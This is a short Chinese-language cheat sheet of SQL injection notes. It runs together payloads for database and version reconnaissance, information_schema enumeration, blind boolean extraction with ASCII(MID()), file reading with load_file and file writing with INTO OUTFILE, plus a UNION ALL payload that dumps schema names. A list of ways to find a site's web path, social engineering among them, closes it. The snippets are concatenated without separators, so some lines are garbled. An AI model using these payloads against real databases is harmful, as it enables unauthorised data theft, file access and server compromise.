sql注入笔记

select length(id) from ot_picture LIMIT 1select database(),user(),VERSION(),@@version_compile_os;select TABLE_NAME from information_schema.`TABLES` where TABLE_SCHEMA='xinghui'select (select top 1 asc(mid(列名,位数,1)) from admin)=97SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1SELECT MID(id,1,1) from ot_picture LIMIT 1select user() ;//文件读取select load_file('D:/text.txt');//文件写入select 'aa',1,2 into outfile 'd:/text.txt'SELECT ASCII('a')SELECT MID('NowaMagic', 1, 2)select * from ot_ucenter_member where id=6171select * from ot_coin where id=8122 and (SELECT ASCII(MID(id,1,1)) from ot_picture LIMIT 1) =49

获取网站路径方法
1.报错显示
2.漏洞报错
3.遗留文件
4.读取配置文件
5.社工

  union all select (select distinct concat(0x7e,0x27,unhex(Hex(cast(schema_name as char))),0x27,0x7e) from `information_schema`.schemata limit 13,1),0x31303235343830303536,0x31303235343830303536